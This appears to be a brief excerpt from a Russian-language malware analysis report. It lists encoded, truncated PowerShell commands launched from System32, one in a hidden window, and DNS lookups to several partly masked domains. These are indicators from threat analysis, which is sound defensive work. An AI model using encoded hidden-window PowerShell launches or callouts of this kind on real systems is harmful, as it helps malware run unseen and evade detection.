Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABOAGUAYgByAGEAcwBrAGEAdABjAGoAPQAnAEMAbABvAHQAaABpAG4AZwBfAEgAbwBtAGUAXwBfAEMAbwBtAHAAdQB0AGUAcgB...
- DNS ASK da#####entadvisors.com
- DNS ASK au####lseafood.com
- DNS ASK nh####kientruc.net
- DNS ASK gl######ddyfederation.com
- DNS ASK 3i######ommunication.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABOAGUAYgByAGEAcwBrAGEAdABjAGoAPQAnAEMAbABvAHQAaABpAG4AZwBfAEgAbwBtAGUAXwBfAEMAbwBtAHAAdQB0AGUAcgB...' (со скрытым окном)